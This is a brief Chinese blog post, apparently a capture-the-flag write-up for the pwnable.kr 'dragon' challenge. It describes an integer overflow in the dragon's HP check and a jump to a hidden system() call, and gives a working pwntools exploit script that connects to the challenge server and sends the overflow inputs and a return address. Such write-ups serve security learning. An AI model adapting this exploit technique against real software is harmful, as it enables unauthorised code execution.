pwnable.kr Rookiss_pt75 dragon - Blog of Mathias
Blog of Mathias Web Securtiy&Deep Learning
pwnable.kr Rookiss_pt75 dragon
发表于: | 分类: 整数溢出 | 评论:0 | 阅读:262

这是一个比较有趣的game,不过无论选择哪个角色都是斗不过恶龙的。但是看恶龙的hp判定的时候,发现存在整数溢出的问题,由于每回合hp+5,因此直接用3,3,2作为payload.

3.png

在这里已经通过了恶龙的关卡,那么接下来如何执行system呢。
ida看到了奇怪的东西,这里存在执行system的语句

1.png

没有开启aslr的情况下,直接输入这个地址就好了。

2.png

于是payload如下:

from pwn import *
g=remote('pwnable.kr',9004)
g.sendline('1')
[g.sendline('3\n3\n2') for i in range(4)]
g.sendline(p32(0x08048DBF))
g.interactive()

还不快抢沙发

添加新评论